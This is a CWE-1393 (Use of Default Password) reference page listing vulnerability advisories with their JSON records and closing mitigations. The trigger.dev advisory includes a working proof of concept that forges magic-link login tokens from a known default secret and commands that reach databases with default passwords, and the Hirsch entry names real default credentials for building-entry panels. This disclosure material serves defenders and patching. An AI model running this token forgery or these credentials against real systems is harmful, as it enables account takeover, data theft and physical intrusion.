Common Weakness Enumeration

CWE-1393

Allowed

Use of Default Password

Abstraction: Base · Status: Incomplete

The product uses default passwords for potentially critical functionality.

79 vulnerabilities reference this CWE, most recent first.

GHSA-PHJ7-P5R6-WJ9C

Vulnerability from github – Published: 2023-06-22 21:30 – Updated: 2023-06-22 21:30
VLAI
Details

Pega platform clients who are using versions 6.1 through 8.8.3 and have upgraded from a version prior to 8.x may be utilizing default credentials.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-28094"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-22T21:15:09Z",
    "severity": "HIGH"
  },
  "details": "Pega platform clients who are using versions 6.1 through 8.8.3 and have upgraded from a version prior to 8.x may be utilizing default credentials.",
  "id": "GHSA-phj7-p5r6-wj9c",
  "modified": "2023-06-22T21:30:49Z",
  "published": "2023-06-22T21:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28094"
    },
    {
      "type": "WEB",
      "url": "https://support.pega.com/support-doc/pega-security-advisory-%E2%80%93-c23-vulnerability-default-operators?"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PJV4-Q49W-6VF2

Vulnerability from github – Published: 2023-12-14 03:30 – Updated: 2023-12-14 03:30
VLAI
Details

IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.3 products use default passwords for a privileged user. IBM X-Force ID: 266874.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-43042"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-14T01:15:07Z",
    "severity": "HIGH"
  },
  "details": "IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.3 products use default passwords for a privileged user.  IBM X-Force ID:  266874.",
  "id": "GHSA-pjv4-q49w-6vf2",
  "modified": "2023-12-14T03:30:53Z",
  "published": "2023-12-14T03:30:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43042"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/266874"
    },
    {
      "type": "WEB",
      "url": "https://https://www.ibm.com/support/pages/node/7064976"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PQXW-G93W-HJ9X

Vulnerability from github – Published: 2026-10-02 22:39 – Updated: 2026-10-02 22:42
VLAI
Summary
Trigger.dev Self-Hosted Deployment: Default Secrets allow Unauthenticated Infrastructure Compromise
Details

Summary

Self-hosted trigger.dev v4 instances deployed using the provided Docker Compose configuration with default secrets from hosting/docker/.env.example are vulnerable to a multi-stage unauthenticated attack chain leading to complete infrastructure compromise.

Vulnerability Details

The hosting/docker/.env.example file contains hardcoded cryptographic secrets:

SESSION_SECRET=2818143646516f6fffd707b36f334bbb
MAGIC_LINK_SECRET=44da78b7bbb0dfe709cf38931d25dcdd
ENCRYPTION_KEY=f686147ab967943ebbe9ed3b496e465a
MANAGED_WORKER_SECRET=447c29678f9eaf289e9c4b70d3dd8a7f

The MAGIC_LINK_SECRET is used by remix-auth-email-link@2.0.2 to create authentication tokens via CryptoJS AES encryption. An attacker who knows this secret can forge valid magic links that authenticate as any email address without email delivery. The validateSessionMagicLink option defaults to false in the library (never overridden by trigger.dev), so no session-side validation occurs. User accounts are auto-created when WHITELISTED_EMAILS is not set (the default for self-hosted).

Steps to Reproduce

Setup

cd hosting/docker && cp .env.example .env
cd webapp && docker compose up -d
cd ../worker && docker compose up -d

Step 1: Forge magic link token

const CryptoJS = require('crypto-js');
const secret = '44da78b7bbb0dfe709cf38931d25dcdd';
const payload = JSON.stringify({e: 'attacker@evil.com', c: Date.now()});
const token = encodeURIComponent(CryptoJS.AES.encrypt(payload, secret).toString());
console.log('https://target:8030/magic?token=' + token);

Step 2: Authenticate via forged magic link

curl -v "http://localhost:8030/magic?token="
# Returns: HTTP 302, set-cookie: __session=eyJ1c2VyIjp7InVzZXJJZCI6ImNtcGg3OTBxZjAwMDR0bjU1ZWM3bHlxN2EifX0=...
# User auto-created, session cookie set, redirects to /orgs/new

Step 3: Verify database access from runner network

docker run --rm --network webapp postgres:14 psql "postgresql://postgres:unsafe-postgres-pw@postgres:5432/main" -c "SELECT id, email FROM \"User\";"
# Returns: cmph790qf0004tn55ec7lyq7a | attacker@evil.com

Step 4: Verify Redis access (no auth)

docker run --rm --network webapp redis:7 redis-cli -h redis PING
# Returns: PONG

Step 5: Verify ClickHouse access

docker run --rm --network webapp curlimages/curl curl -s "http://default:password@clickhouse:8123/?query=SELECT%20version()"
# Returns: 25.5.2.47

Root Cause

  1. Hardcoded secrets in hosting/docker/.env.example (lines 9-12)
  2. Runner containers placed on infrastructure networks: DOCKER_RUNNER_NETWORKS: webapp,supervisor in hosting/docker/worker/docker-compose.yml:42
  3. Default credentials on all infrastructure services
  4. No Redis authentication
  5. SESSION_SECRET reused for JWT signing (apps/webapp/app/services/apiAuth.server.ts:616) and impersonation tokens

Impact

Complete infrastructure compromise: all tenant data, API keys, encrypted secrets (decryptable with known ENCRYPTION_KEY), user accounts, cross-tenant access. Attacker can modify data, push backdoored Docker images to the registry, and manipulate job queues.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.5.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "trigger.dev"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393",
      "CWE-653"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-02T22:39:48Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nSelf-hosted trigger.dev v4 instances deployed using the provided Docker Compose configuration with default secrets from `hosting/docker/.env.example` are vulnerable to a multi-stage unauthenticated attack chain leading to complete infrastructure compromise.\n\n## Vulnerability Details\n\nThe `hosting/docker/.env.example` file contains hardcoded cryptographic secrets:\n\n```\nSESSION_SECRET=2818143646516f6fffd707b36f334bbb\nMAGIC_LINK_SECRET=44da78b7bbb0dfe709cf38931d25dcdd\nENCRYPTION_KEY=f686147ab967943ebbe9ed3b496e465a\nMANAGED_WORKER_SECRET=447c29678f9eaf289e9c4b70d3dd8a7f\n```\n\nThe `MAGIC_LINK_SECRET` is used by `remix-auth-email-link@2.0.2` to create authentication tokens via CryptoJS AES encryption. An attacker who knows this secret can forge valid magic links that authenticate as any email address without email delivery. The `validateSessionMagicLink` option defaults to `false` in the library (never overridden by trigger.dev), so no session-side validation occurs. User accounts are auto-created when `WHITELISTED_EMAILS` is not set (the default for self-hosted).\n\n## Steps to Reproduce\n\n### Setup\n```bash\ncd hosting/docker \u0026\u0026 cp .env.example .env\ncd webapp \u0026\u0026 docker compose up -d\ncd ../worker \u0026\u0026 docker compose up -d\n```\n\n### Step 1: Forge magic link token\n```javascript\nconst CryptoJS = require(\u0027crypto-js\u0027);\nconst secret = \u002744da78b7bbb0dfe709cf38931d25dcdd\u0027;\nconst payload = JSON.stringify({e: \u0027attacker@evil.com\u0027, c: Date.now()});\nconst token = encodeURIComponent(CryptoJS.AES.encrypt(payload, secret).toString());\nconsole.log(\u0027https://target:8030/magic?token=\u0027 + token);\n```\n\n### Step 2: Authenticate via forged magic link\n```bash\ncurl -v \"http://localhost:8030/magic?token=\"\n# Returns: HTTP 302, set-cookie: __session=eyJ1c2VyIjp7InVzZXJJZCI6ImNtcGg3OTBxZjAwMDR0bjU1ZWM3bHlxN2EifX0=...\n# User auto-created, session cookie set, redirects to /orgs/new\n```\n\n### Step 3: Verify database access from runner network\n```bash\ndocker run --rm --network webapp postgres:14 psql \"postgresql://postgres:unsafe-postgres-pw@postgres:5432/main\" -c \"SELECT id, email FROM \\\"User\\\";\"\n# Returns: cmph790qf0004tn55ec7lyq7a | attacker@evil.com\n```\n\n### Step 4: Verify Redis access (no auth)\n```bash\ndocker run --rm --network webapp redis:7 redis-cli -h redis PING\n# Returns: PONG\n```\n\n### Step 5: Verify ClickHouse access\n```bash\ndocker run --rm --network webapp curlimages/curl curl -s \"http://default:password@clickhouse:8123/?query=SELECT%20version()\"\n# Returns: 25.5.2.47\n```\n\n## Root Cause\n\n1. Hardcoded secrets in `hosting/docker/.env.example` (lines 9-12)\n2. Runner containers placed on infrastructure networks: `DOCKER_RUNNER_NETWORKS: webapp,supervisor` in `hosting/docker/worker/docker-compose.yml:42`\n3. Default credentials on all infrastructure services\n4. No Redis authentication\n5. SESSION_SECRET reused for JWT signing (`apps/webapp/app/services/apiAuth.server.ts:616`) and impersonation tokens\n\n## Impact\n\nComplete infrastructure compromise: all tenant data, API keys, encrypted secrets (decryptable with known ENCRYPTION_KEY), user accounts, cross-tenant access. Attacker can modify data, push backdoored Docker images to the registry, and manipulate job queues.",
  "id": "GHSA-pqxw-g93w-hj9x",
  "modified": "2026-10-02T22:42:06Z",
  "published": "2026-10-02T22:39:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/triggerdotdev/trigger.dev/security/advisories/GHSA-pqxw-g93w-hj9x"
    },
    {
      "type": "WEB",
      "url": "https://github.com/triggerdotdev/trigger.dev/pull/4316"
    },
    {
      "type": "WEB",
      "url": "https://github.com/triggerdotdev/trigger.dev/commit/6997aeb05e27d2db47f9eda01fdc8a17c81a1ae0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/triggerdotdev/trigger.dev"
    },
    {
      "type": "WEB",
      "url": "https://github.com/triggerdotdev/trigger.dev/releases/tag/v4.5.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Trigger.dev Self-Hosted Deployment: Default Secrets allow Unauthenticated Infrastructure Compromise"
}

GHSA-PX6F-Q5HR-GQCP

Vulnerability from github – Published: 2026-02-25 15:31 – Updated: 2026-02-25 15:31
VLAI
Details

A vulnerability was determined in feiyuchuixue sz-boot-parent up to 1.3.2-beta. Affected by this vulnerability is an unknown functionality of the file /api/admin/sys-user/reset/password/ of the component Password Reset Handler. This manipulation of the argument userId causes use of default password. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 1.3.3-beta addresses this issue. Patch name: aefaabfd7527188bfba3c8c9eee17c316d094802. It is suggested to upgrade the affected component. The project was informed beforehand and acted very professional: "We have added authorization validation to the password reset interface; now only users with the corresponding permissions are allowed to perform password resets."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-3186"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-25T14:16:21Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was determined in feiyuchuixue sz-boot-parent up to 1.3.2-beta. Affected by this vulnerability is an unknown functionality of the file /api/admin/sys-user/reset/password/ of the component Password Reset Handler. This manipulation of the argument userId causes use of default password. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 1.3.3-beta addresses this issue. Patch name: aefaabfd7527188bfba3c8c9eee17c316d094802. It is suggested to upgrade the affected component. The project was informed beforehand and acted very professional: \"We have added authorization validation to the password reset interface; now only users with the corresponding permissions are allowed to perform password resets.\"",
  "id": "GHSA-px6f-q5hr-gqcp",
  "modified": "2026-02-25T15:31:40Z",
  "published": "2026-02-25T15:31:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3186"
    },
    {
      "type": "WEB",
      "url": "https://github.com/feiyuchuixue/sz-boot-parent/commit/aefaabfd7527188bfba3c8c9eee17c316d094802"
    },
    {
      "type": "WEB",
      "url": "https://github.com/feiyuchuixue/sz-boot-parent"
    },
    {
      "type": "WEB",
      "url": "https://github.com/feiyuchuixue/sz-boot-parent/releases/tag/v1.3.3-beta"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yuccun/CVE/blob/main/sz-boot-parent-VPE_Unauthorized_Password_Reset.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.347744"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.347744"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.754037"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-RJFQ-P48J-H96H

Vulnerability from github – Published: 2024-07-24 15:31 – Updated: 2025-10-22 00:33
VLAI
Details

Remote command execution due to use of default passwords. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, Acronis Cyber Infrastructure (ACI) before build 5.1.1-71, Acronis Cyber Infrastructure (ACI) before build 5.2.1-69, Acronis Cyber Infrastructure (ACI) before build 5.3.1-53, Acronis Cyber Infrastructure (ACI) before build 5.4.4-132.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-45249"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393",
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-24T14:15:04Z",
    "severity": "CRITICAL"
  },
  "details": "Remote command execution due to use of default passwords. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, Acronis Cyber Infrastructure (ACI) before build 5.1.1-71, Acronis Cyber Infrastructure (ACI) before build 5.2.1-69, Acronis Cyber Infrastructure (ACI) before build 5.3.1-53, Acronis Cyber Infrastructure (ACI) before build 5.4.4-132.",
  "id": "GHSA-rjfq-p48j-h96h",
  "modified": "2025-10-22T00:33:04Z",
  "published": "2024-07-24T15:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45249"
    },
    {
      "type": "WEB",
      "url": "https://security-advisory.acronis.com/advisories/SEC-6452"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-45249"
    },
    {
      "type": "WEB",
      "url": "https://www.securityweek.com/acronis-product-vulnerability-exploited-in-the-wild"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RRMQ-292Q-2GHP

Vulnerability from github – Published: 2025-03-28 18:33 – Updated: 2025-03-28 18:33
VLAI
Details

A vulnerability classified as critical has been found in Netis WF-2404 1.1.124EN. Affected is an unknown function of the file /etc/passwd. The manipulation with the input Realtek leads to use of default password. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-2921"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-28T18:15:17Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability classified as critical has been found in Netis WF-2404 1.1.124EN. Affected is an unknown function of the file /etc/passwd. The manipulation with the input Realtek leads to use of default password. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-rrmq-292q-2ghp",
  "modified": "2025-03-28T18:33:37Z",
  "published": "2025-03-28T18:33:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2921"
    },
    {
      "type": "WEB",
      "url": "https://scoozi.substack.com/p/hacking-a-netis-wf-2404-router-cont"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.301896"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.301896"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.521038"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:P/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-RX95-F4H8-XF6W

Vulnerability from github – Published: 2023-04-24 12:30 – Updated: 2024-04-04 03:39
VLAI
Details

Use of default password vulnerability in PowerPanel Business Local/Remote for Windows v4.8.6 and earlier, PowerPanel Business Management for Windows v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 32bit v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 64bit v4.8.6 and earlier, PowerPanel Business Management for Linux 32bit v4.8.6 and earlier, PowerPanel Business Management for Linux 64bit v4.8.6 and earlier, PowerPanel Business Local/Remote for MacOS v4.8.6 and earlier, and PowerPanel Business Management for MacOS v4.8.6 and earlier allows remote attackers to log in to the server directly to perform administrative functions. Upon installation or upon first login, the application does not ask the user to change the 'admin' password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-25131"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393",
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-24T10:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "Use of default password vulnerability in PowerPanel Business Local/Remote for Windows v4.8.6 and earlier, PowerPanel Business Management for Windows v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 32bit v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 64bit v4.8.6 and earlier, PowerPanel Business Management for Linux 32bit v4.8.6 and earlier, PowerPanel Business Management for Linux 64bit v4.8.6 and earlier, PowerPanel Business Local/Remote for MacOS v4.8.6 and earlier, and PowerPanel Business Management for MacOS v4.8.6 and earlier allows remote attackers to log in to the server directly to perform administrative functions. Upon installation or upon first login, the application does not ask the user to change the \u0027admin\u0027 password.",
  "id": "GHSA-rx95-f4h8-xf6w",
  "modified": "2024-04-04T03:39:04Z",
  "published": "2023-04-24T12:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25131"
    },
    {
      "type": "WEB",
      "url": "https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_linux#downloads"
    },
    {
      "type": "WEB",
      "url": "https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_mac#downloads"
    },
    {
      "type": "WEB",
      "url": "https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_virtual_machine#downloads"
    },
    {
      "type": "WEB",
      "url": "https://www.cyberpower.com/global/en/product/sku/powerpanel_business_for_windows#downloads"
    },
    {
      "type": "WEB",
      "url": "https://zuso.ai/Advisory"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X8V9-7R66-C92W

Vulnerability from github – Published: 2025-02-15 15:30 – Updated: 2025-02-24 18:32
VLAI
Details

The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE: the Supplier's perspective is that the "vulnerable systems are not following manufacturers' recommendations to change the default password."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-15T15:15:23Z",
    "severity": "CRITICAL"
  },
  "details": "The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents\u0027 PII. NOTE: the Supplier\u0027s perspective is that the \"vulnerable systems are not following manufacturers\u0027 recommendations to change the default password.\"",
  "id": "GHSA-x8v9-7r66-c92w",
  "modified": "2025-02-24T18:32:36Z",
  "published": "2025-02-15T15:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26793"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=43160884"
    },
    {
      "type": "WEB",
      "url": "https://support.identiv.com/products/physical-access/hirsch"
    },
    {
      "type": "WEB",
      "url": "https://www.ericdaigle.ca/posts/breaking-into-dozens-of-apartments-in-five-minutes"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:S/MSA:X/S:P/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XWMM-QMXV-WFH3

Vulnerability from github – Published: 2026-01-26 18:31 – Updated: 2026-01-29 15:30
VLAI
Details

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage these default credentials to gain authenticated access to the management interface.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-24429"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1393"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-26T18:16:40Z",
    "severity": "CRITICAL"
  },
  "details": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage these default credentials to gain authenticated access to the management interface.",
  "id": "GHSA-xwmm-qmxv-wfh3",
  "modified": "2026-01-29T15:30:26Z",
  "published": "2026-01-26T18:31:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24429"
    },
    {
      "type": "WEB",
      "url": "https://www.tendacn.com/product/W30E"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-hardcoded-default-password-for-built-in-account"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation
Requirements

Prohibit use of default, hard-coded, or other values that do not vary for each installation of the product - especially for separate organizations.

Mitigation
Documentation

Ensure that product documentation clearly emphasizes the presence of default passwords and provides steps for the administrator to change them.

Mitigation
Architecture and Design

Force the administrator to change the credential upon installation.

Mitigation
Installation Operation

The product administrator could change the defaults upon installation or during operation.

No CAPEC attack patterns related to this CWE.